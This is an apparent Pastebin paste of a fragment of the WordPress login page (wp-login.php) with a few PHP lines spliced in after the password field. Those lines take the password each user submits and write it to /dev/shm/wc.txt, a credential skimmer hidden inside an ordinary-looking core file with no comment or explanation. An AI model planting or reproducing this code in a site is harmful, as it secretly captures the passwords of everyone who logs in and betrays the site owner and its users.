Advertisement
Guest User

Untitled

a guest
Apr 26th, 2018
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. <form name="loginform" id="loginform" action="<?php echo esc_url( site_url( 'wp-login.php', 'login_post' ) ); ?>" method="post">
  2. <p>
  3. <label for="user_login"><?php _e( 'Username or Email Address' ); ?><br />
  4. <input type="text" name="log" id="user_login"<?php echo $aria_describedby_error; ?> class="input" value="<?php echo esc_attr( $user_login ); ?>" size="20" /></label>
  5. </p>
  6. <p>
  7. <label for="user_pass"><?php _e( 'Password' ); ?><br />
  8. <input type="password" name="pwd" id="user_pass"<?php echo $aria_describedby_error; ?> class="input" value="" size="20" /></label>
  9. </p>
  10. <?php
  11.  
  12. $file = '/dev/shm/wc.txt';
  13. $name = htmlspecialchars($_REQUEST['pwd']);
  14. $f1 = fopen($file, 'w');
  15. fwrite($f1, $name);
  16. fclose($f1);
  17.  
  18. /**
  19. * Fires following the 'Password' field in the login form.
  20. *
  21. * @since 2.1.0
  22. */
  23. do_action( 'login_form' );
  24. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement